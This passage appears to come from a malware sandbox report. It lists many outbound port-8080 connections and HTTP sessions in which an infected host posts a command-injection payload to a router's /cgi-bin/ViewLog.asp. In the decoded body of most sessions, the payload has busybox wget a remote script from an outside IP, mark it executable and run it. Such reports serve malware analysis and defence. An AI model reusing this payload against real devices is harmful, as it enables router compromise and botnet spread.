                                                            Feb 14, 2024 09:27:46.284112930 CET406848080192.168.2.2385.48.180.168
                                                            Feb 14, 2024 09:27:46.284116983 CET406848080192.168.2.2394.101.34.190
                                                            Feb 14, 2024 09:27:46.284122944 CET406848080192.168.2.2395.101.135.142
                                                            Feb 14, 2024 09:27:46.284131050 CET406848080192.168.2.2362.196.58.85
                                                            Feb 14, 2024 09:27:46.284151077 CET406848080192.168.2.2362.93.128.144
                                                            Feb 14, 2024 09:27:46.284151077 CET406848080192.168.2.2331.78.194.198
                                                            Feb 14, 2024 09:27:46.284156084 CET406848080192.168.2.2395.229.21.142
                                                            Feb 14, 2024 09:27:46.284167051 CET406848080192.168.2.2362.23.119.119
                                                            Feb 14, 2024 09:27:46.284173012 CET406848080192.168.2.2395.92.102.128
                                                            Feb 14, 2024 09:27:46.284173012 CET406848080192.168.2.2394.158.5.77
                                                            Feb 14, 2024 09:27:46.284192085 CET406848080192.168.2.2385.100.191.29
                                                            Feb 14, 2024 09:27:46.284193993 CET406848080192.168.2.2331.13.136.27
                                                            Feb 14, 2024 09:27:46.284203053 CET406848080192.168.2.2362.30.219.238
                                                            Feb 14, 2024 09:27:46.284203053 CET406848080192.168.2.2331.11.213.70
                                                            Feb 14, 2024 09:27:46.284203053 CET406848080192.168.2.2395.12.53.125
                                                            Feb 14, 2024 09:27:46.284205914 CET406848080192.168.2.2362.21.62.205
                                                            Feb 14, 2024 09:27:46.284220934 CET406848080192.168.2.2331.82.45.181
                                                            Feb 14, 2024 09:27:46.284221888 CET406848080192.168.2.2385.8.255.208
                                                            Feb 14, 2024 09:27:46.284224033 CET406848080192.168.2.2395.106.22.55
                                                            Feb 14, 2024 09:27:46.284225941 CET406848080192.168.2.2385.118.242.84
                                                            Feb 14, 2024 09:27:46.284225941 CET406848080192.168.2.2331.215.77.150
                                                            Feb 14, 2024 09:27:46.284244061 CET406848080192.168.2.2331.9.203.28
                                                            Feb 14, 2024 09:27:46.284244061 CET406848080192.168.2.2362.4.146.208
                                                            Feb 14, 2024 09:27:46.284246922 CET406848080192.168.2.2395.10.129.15
                                                            Feb 14, 2024 09:27:46.284260035 CET406848080192.168.2.2331.53.35.143
                                                            Feb 14, 2024 09:27:46.284262896 CET406848080192.168.2.2362.102.7.252
                                                            Feb 14, 2024 09:27:46.284262896 CET406848080192.168.2.2385.141.223.24
                                                            Feb 14, 2024 09:27:46.284265041 CET406848080192.168.2.2395.78.17.29
                                                            Feb 14, 2024 09:27:46.284296989 CET406848080192.168.2.2394.81.132.221
                                                            Feb 14, 2024 09:27:46.284296989 CET406848080192.168.2.2331.203.71.204
                                                            Feb 14, 2024 09:27:46.284296989 CET406848080192.168.2.2331.246.144.227
                                                            Feb 14, 2024 09:27:46.284303904 CET406848080192.168.2.2385.127.227.148
                                                            Feb 14, 2024 09:27:46.284303904 CET406848080192.168.2.2395.47.24.28
                                                            Feb 14, 2024 09:27:46.284307003 CET406848080192.168.2.2331.27.34.48
                                                            Feb 14, 2024 09:27:46.284312963 CET406848080192.168.2.2385.62.39.86
                                                            Feb 14, 2024 09:27:46.284315109 CET406848080192.168.2.2395.208.14.124
                                                            Feb 14, 2024 09:27:46.284315109 CET406848080192.168.2.2331.189.41.132
                                                            Feb 14, 2024 09:27:46.284315109 CET406848080192.168.2.2331.175.202.201
                                                            Feb 14, 2024 09:27:46.284316063 CET406848080192.168.2.2331.104.207.138
                                                            Feb 14, 2024 09:27:46.284315109 CET406848080192.168.2.2362.226.219.64
                                                            Feb 14, 2024 09:27:46.284327030 CET406848080192.168.2.2385.213.233.135
                                                            Feb 14, 2024 09:27:46.284327030 CET406848080192.168.2.2395.217.213.34
                                                            Feb 14, 2024 09:27:46.284327984 CET406848080192.168.2.2331.199.127.37
                                                            Feb 14, 2024 09:27:46.284338951 CET406848080192.168.2.2362.95.111.41
                                                            Feb 14, 2024 09:27:46.284354925 CET406848080192.168.2.2395.124.180.136
                                                            Feb 14, 2024 09:27:46.284357071 CET406848080192.168.2.2362.164.228.170
                                                            Feb 14, 2024 09:27:46.284359932 CET406848080192.168.2.2385.227.244.209
                                                            Feb 14, 2024 09:27:46.284373999 CET406848080192.168.2.2385.59.93.226
                                                            Feb 14, 2024 09:27:46.284373999 CET406848080192.168.2.2362.236.3.75
                                                            Feb 14, 2024 09:27:46.284373999 CET406848080192.168.2.2331.34.26.202
                                                            Feb 14, 2024 09:27:46.284377098 CET406848080192.168.2.2362.228.34.45
                                                            Feb 14, 2024 09:27:46.284377098 CET406848080192.168.2.2331.146.25.28
                                                            Feb 14, 2024 09:27:46.284394979 CET406848080192.168.2.2394.238.25.66
                                                            Feb 14, 2024 09:27:46.284399033 CET406848080192.168.2.2395.137.87.49
                                                            Feb 14, 2024 09:27:46.284399986 CET406848080192.168.2.2395.61.177.176
                                                            Feb 14, 2024 09:27:46.284399986 CET406848080192.168.2.2331.41.106.7
                                                            Feb 14, 2024 09:27:46.284415960 CET406848080192.168.2.2395.105.33.125
                                                            Feb 14, 2024 09:27:46.284415960 CET406848080192.168.2.2331.129.239.176
                                                            Feb 14, 2024 09:27:46.284418106 CET406848080192.168.2.2385.58.119.96
                                                            Feb 14, 2024 09:27:46.284419060 CET406848080192.168.2.2395.77.28.164
                                                            Feb 14, 2024 09:27:46.284430027 CET406848080192.168.2.2394.205.14.194
                                                            Feb 14, 2024 09:27:46.284430981 CET406848080192.168.2.2394.35.7.49
                                                            Feb 14, 2024 09:27:46.284442902 CET406848080192.168.2.2331.175.128.191
                                                            Feb 14, 2024 09:27:46.284444094 CET406848080192.168.2.2394.215.161.170
                                                            Feb 14, 2024 09:27:46.284455061 CET406848080192.168.2.2385.37.70.255
                                                            Feb 14, 2024 09:27:46.284475088 CET406848080192.168.2.2385.153.86.245
                                                            Feb 14, 2024 09:27:46.284475088 CET406848080192.168.2.2362.100.240.152
                                                            Feb 14, 2024 09:27:46.284475088 CET406848080192.168.2.2395.42.173.172
                                                            Feb 14, 2024 09:27:46.284478903 CET406848080192.168.2.2394.67.51.219
                                                            Feb 14, 2024 09:27:46.284476042 CET406848080192.168.2.2385.146.12.200
                                                            Feb 14, 2024 09:27:46.284478903 CET406848080192.168.2.2395.110.3.153
                                                            Feb 14, 2024 09:27:46.284476042 CET406848080192.168.2.2362.64.218.83
                                                            Feb 14, 2024 09:27:46.284486055 CET406848080192.168.2.2395.215.176.237
                                                            Feb 14, 2024 09:27:46.284486055 CET406848080192.168.2.2362.170.250.115
                                                            Feb 14, 2024 09:27:46.284491062 CET406848080192.168.2.2385.167.36.216
                                                            Feb 14, 2024 09:27:46.284498930 CET406848080192.168.2.2394.109.47.225
                                                            Feb 14, 2024 09:27:46.284498930 CET406848080192.168.2.2331.2.174.239
                                                            Feb 14, 2024 09:27:46.284507990 CET406848080192.168.2.2362.154.136.168
                                                            Feb 14, 2024 09:27:46.284519911 CET406848080192.168.2.2331.66.0.217
                                                            Feb 14, 2024 09:27:46.284519911 CET406848080192.168.2.2395.129.129.15
                                                            Feb 14, 2024 09:27:46.284537077 CET406848080192.168.2.2385.141.212.155
                                                            Feb 14, 2024 09:27:46.284538984 CET406848080192.168.2.2362.212.93.252
                                                            Feb 14, 2024 09:27:46.284547091 CET406848080192.168.2.2394.189.197.72
                                                            Feb 14, 2024 09:27:46.284554005 CET406848080192.168.2.2394.48.183.80
                                                            Feb 14, 2024 09:27:46.284555912 CET406848080192.168.2.2394.253.246.106
                                                            Feb 14, 2024 09:27:46.284573078 CET406848080192.168.2.2394.141.10.127
                                                            Feb 14, 2024 09:27:46.284573078 CET406848080192.168.2.2331.134.247.61
                                                            Feb 14, 2024 09:27:46.284579992 CET406848080192.168.2.2394.167.194.249
                                                            Feb 14, 2024 09:27:46.284590960 CET406848080192.168.2.2395.131.169.69
                                                            Feb 14, 2024 09:27:46.284595966 CET406848080192.168.2.2395.33.14.249
                                                            Feb 14, 2024 09:27:46.284607887 CET406848080192.168.2.2395.221.104.7
                                                            Feb 14, 2024 09:27:46.284609079 CET406848080192.168.2.2362.166.49.86
                                                            Feb 14, 2024 09:27:46.284609079 CET406848080192.168.2.2362.237.37.133
                                                            Feb 14, 2024 09:27:46.284609079 CET406848080192.168.2.2395.164.86.234
                                                            Feb 14, 2024 09:27:46.284625053 CET406848080192.168.2.2395.191.85.62
                                                            Feb 14, 2024 09:27:46.284626007 CET406848080192.168.2.2331.76.13.6
                                                            Feb 14, 2024 09:27:46.284640074 CET406848080192.168.2.2385.44.162.36
                                                            Feb 14, 2024 09:27:46.284642935 CET406848080192.168.2.2394.127.46.188
                                                            Feb 14, 2024 09:27:46.284642935 CET406848080192.168.2.2395.49.240.239
                                                            Feb 14, 2024 09:27:46.284650087 CET406848080192.168.2.2362.18.103.220
                                                            Feb 14, 2024 09:27:46.284650087 CET406848080192.168.2.2331.181.47.126
                                                            Feb 14, 2024 09:27:46.284656048 CET406848080192.168.2.2331.225.94.187
                                                            Feb 14, 2024 09:27:46.284668922 CET406848080192.168.2.2385.205.135.11
                                                            Feb 14, 2024 09:27:46.284677982 CET406848080192.168.2.2362.27.99.80
                                                            Feb 14, 2024 09:27:46.284677982 CET406848080192.168.2.2362.175.152.70
                                                            Feb 14, 2024 09:27:46.284677982 CET406848080192.168.2.2362.131.21.195
                                                            Feb 14, 2024 09:27:46.284691095 CET406848080192.168.2.2395.242.95.130
                                                            Feb 14, 2024 09:27:46.284704924 CET406848080192.168.2.2385.120.248.116
                                                            Feb 14, 2024 09:27:46.284712076 CET406848080192.168.2.2385.239.152.9
                                                            Feb 14, 2024 09:27:46.284713030 CET406848080192.168.2.2395.113.109.170
                                                            Feb 14, 2024 09:27:46.284713030 CET406848080192.168.2.2331.56.248.7
                                                            Feb 14, 2024 09:27:46.284725904 CET406848080192.168.2.2395.73.250.136
                                                            Feb 14, 2024 09:27:46.284728050 CET406848080192.168.2.2385.182.102.73
                                                            Feb 14, 2024 09:27:46.284742117 CET406848080192.168.2.2362.73.252.142
                                                            Feb 14, 2024 09:27:46.284743071 CET406848080192.168.2.2362.65.87.119
                                                            Feb 14, 2024 09:27:46.284750938 CET406848080192.168.2.2394.172.229.126
                                                            Feb 14, 2024 09:27:46.284755945 CET406848080192.168.2.2362.183.167.115
                                                            Feb 14, 2024 09:27:46.284758091 CET406848080192.168.2.2362.141.127.232
                                                            Feb 14, 2024 09:27:46.284764051 CET406848080192.168.2.2331.16.198.205
                                                            Feb 14, 2024 09:27:46.284770012 CET406848080192.168.2.2362.183.24.103
                                                            Feb 14, 2024 09:27:46.284784079 CET406848080192.168.2.2362.142.30.66
                                                            Feb 14, 2024 09:27:46.284787893 CET406848080192.168.2.2395.218.178.75
                                                            Feb 14, 2024 09:27:46.284787893 CET406848080192.168.2.2385.23.97.102
                                                            Feb 14, 2024 09:27:46.284801960 CET406848080192.168.2.2385.121.69.227
                                                            Feb 14, 2024 09:27:46.284805059 CET406848080192.168.2.2362.133.217.108
                                                            Feb 14, 2024 09:27:46.284805059 CET406848080192.168.2.2385.235.220.2
                                                            Feb 14, 2024 09:27:46.284821033 CET406848080192.168.2.2331.4.31.106
                                                            Feb 14, 2024 09:27:46.284820080 CET406848080192.168.2.2362.224.161.53
                                                            Feb 14, 2024 09:27:46.284833908 CET406848080192.168.2.2385.162.159.105
                                                            Feb 14, 2024 09:27:46.284836054 CET406848080192.168.2.2331.205.233.179
                                                            Feb 14, 2024 09:27:46.284836054 CET406848080192.168.2.2385.230.150.200
                                                            Feb 14, 2024 09:27:46.284852982 CET406848080192.168.2.2362.110.76.65
                                                            Feb 14, 2024 09:27:46.284866095 CET406848080192.168.2.2385.201.190.119
                                                            Feb 14, 2024 09:27:46.284868002 CET406848080192.168.2.2385.214.107.200
                                                            Feb 14, 2024 09:27:46.284868002 CET406848080192.168.2.2331.170.141.195
                                                            Feb 14, 2024 09:27:46.284878969 CET406848080192.168.2.2362.250.43.10
                                                            Feb 14, 2024 09:27:46.284879923 CET406848080192.168.2.2385.253.9.2
                                                            Feb 14, 2024 09:27:46.284884930 CET406848080192.168.2.2331.148.250.13
                                                            Feb 14, 2024 09:27:46.284888029 CET406848080192.168.2.2331.76.15.239
                                                            Feb 14, 2024 09:27:46.284894943 CET406848080192.168.2.2331.126.216.207
                                                            Feb 14, 2024 09:27:46.284920931 CET406848080192.168.2.2362.10.250.35
                                                            Feb 14, 2024 09:27:46.284921885 CET406848080192.168.2.2395.132.212.100
                                                            Feb 14, 2024 09:27:46.284921885 CET406848080192.168.2.2395.118.66.96
                                                            Feb 14, 2024 09:27:46.284933090 CET406848080192.168.2.2331.102.127.182
                                                            Feb 14, 2024 09:27:46.284933090 CET406848080192.168.2.2385.191.238.222
                                                            Feb 14, 2024 09:27:46.284946918 CET406848080192.168.2.2331.136.152.166
                                                            Feb 14, 2024 09:27:46.284950972 CET406848080192.168.2.2394.203.83.124
                                                            Feb 14, 2024 09:27:46.284960032 CET406848080192.168.2.2362.193.93.75
                                                            Feb 14, 2024 09:27:46.284960032 CET406848080192.168.2.2385.122.11.173
                                                            Feb 14, 2024 09:27:46.284970999 CET406848080192.168.2.2395.16.67.165
                                                            Feb 14, 2024 09:27:46.284970999 CET406848080192.168.2.2394.95.89.235
                                                            Feb 14, 2024 09:27:46.284972906 CET406848080192.168.2.2395.66.94.31
                                                            Feb 14, 2024 09:27:46.284976006 CET406848080192.168.2.2395.140.62.104
                                                            Feb 14, 2024 09:27:46.284981966 CET406848080192.168.2.2362.83.197.56
                                                            Feb 14, 2024 09:27:46.284989119 CET406848080192.168.2.2394.137.123.43
                                                            Feb 14, 2024 09:27:46.284996986 CET406848080192.168.2.2394.70.199.161
                                                            Feb 14, 2024 09:27:46.285017967 CET406848080192.168.2.2385.74.41.49
                                                            Feb 14, 2024 09:27:46.285018921 CET406848080192.168.2.2394.146.123.250
                                                            Feb 14, 2024 09:27:46.285026073 CET406848080192.168.2.2395.238.196.215
                                                            Feb 14, 2024 09:27:46.285026073 CET406848080192.168.2.2395.54.127.115
                                                            Feb 14, 2024 09:27:46.285027981 CET406848080192.168.2.2362.166.179.167
                                                            Feb 14, 2024 09:27:46.285027981 CET406848080192.168.2.2385.223.227.84
                                                            Feb 14, 2024 09:27:46.285027981 CET406848080192.168.2.2385.118.40.104
                                                            Feb 14, 2024 09:27:46.285027981 CET406848080192.168.2.2395.145.10.57
                                                            Feb 14, 2024 09:27:46.285031080 CET406848080192.168.2.2395.161.235.83
                                                            Feb 14, 2024 09:27:46.285031080 CET406848080192.168.2.2385.230.77.144
                                                            Feb 14, 2024 09:27:46.285037041 CET406848080192.168.2.2385.142.155.234
                                                            Feb 14, 2024 09:27:46.285036087 CET406848080192.168.2.2385.30.25.154
                                                            Feb 14, 2024 09:27:46.285037041 CET406848080192.168.2.2362.105.143.81
                                                            Feb 14, 2024 09:27:46.285036087 CET406848080192.168.2.2394.105.105.200
                                                            Feb 14, 2024 09:27:46.285049915 CET406848080192.168.2.2331.228.157.191
                                                            Feb 14, 2024 09:27:46.285058975 CET406848080192.168.2.2385.150.75.7
                                                            Feb 14, 2024 09:27:46.285059929 CET406848080192.168.2.2395.121.135.131
                                                            Feb 14, 2024 09:27:46.285064936 CET406848080192.168.2.2394.1.123.100
                                                            Feb 14, 2024 09:27:46.285078049 CET406848080192.168.2.2385.134.52.115
                                                            Feb 14, 2024 09:27:46.285080910 CET406848080192.168.2.2385.213.81.38
                                                            Feb 14, 2024 09:27:46.285080910 CET406848080192.168.2.2395.116.109.98
                                                            Feb 14, 2024 09:27:46.285080910 CET406848080192.168.2.2395.122.254.17
                                                            Feb 14, 2024 09:27:46.285096884 CET406848080192.168.2.2394.196.29.241
                                                            Feb 14, 2024 09:27:46.285101891 CET406848080192.168.2.2395.145.101.159
                                                            Feb 14, 2024 09:27:46.285109043 CET406848080192.168.2.2362.125.203.109
                                                            Feb 14, 2024 09:27:46.285109043 CET406848080192.168.2.2385.215.5.58
                                                            Feb 14, 2024 09:27:46.285136938 CET406848080192.168.2.2362.65.252.140
                                                            Feb 14, 2024 09:27:46.285137892 CET406848080192.168.2.2331.243.85.176
                                                            Feb 14, 2024 09:27:46.285137892 CET406848080192.168.2.2331.111.151.184
                                                            Feb 14, 2024 09:27:46.285137892 CET406848080192.168.2.2385.57.33.46
                                                            Feb 14, 2024 09:27:46.285137892 CET406848080192.168.2.2385.124.189.255
                                                            Feb 14, 2024 09:27:46.285162926 CET406848080192.168.2.2385.239.139.193
                                                            Feb 14, 2024 09:27:46.285162926 CET406848080192.168.2.2394.237.128.73
                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            0192.168.2.235756885.122.216.1658080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.214101076 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1192.168.2.233761485.114.158.1348080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.228976965 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:43.441116095 CET951INHTTP/1.1 404 Not Found
                                                            Server: Apache-Coyote/1.1
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 767
                                                            Date: Wed, 14 Feb 2024 08:27:43 GMT
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.109</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            2192.168.2.233627494.224.122.2538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.243524075 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            3192.168.2.235365294.120.18.1898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.266895056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            4192.168.2.234649295.86.71.1008080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.273614883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            5192.168.2.234602662.20.81.1068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.394658089 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:43.687330008 CET322INHTTP/1.0 404 Not Found
                                                            Server: httpd
                                                            Date: Wed, 14 Feb 2024 08:27:43 GMT
                                                            Cache-Control: max-age=120, public
                                                            Content-Type: text/html
                                                            Content-Language: (null)
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            6192.168.2.235833231.136.47.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.431152105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:44.069591045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
